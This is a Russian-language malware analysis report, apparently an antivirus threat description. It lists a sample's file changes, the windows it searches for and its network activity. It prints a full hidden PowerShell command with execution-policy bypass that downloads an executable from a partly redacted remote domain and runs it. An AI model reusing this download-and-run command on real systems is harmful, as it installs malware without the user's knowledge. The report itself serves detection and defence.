Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ma###msrl.com/kd9.exe как %appdata%\orderf
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\orderf
Удаляет следующие файлы
- %TEMP%\abdtfhghgdghghœ.sct
Сетевая активность
Подключается к
- 'ma###msrl.com':80
UDP
- DNS ASK ma###msrl.com
Другое
Ищет следующие окна
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'AdobeAcrobat' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma###msrl.com/KD9.exe','%APPDATA%\Orderf');Start-Process '%APPDATA%\Or...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Orderf
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\Orderf"
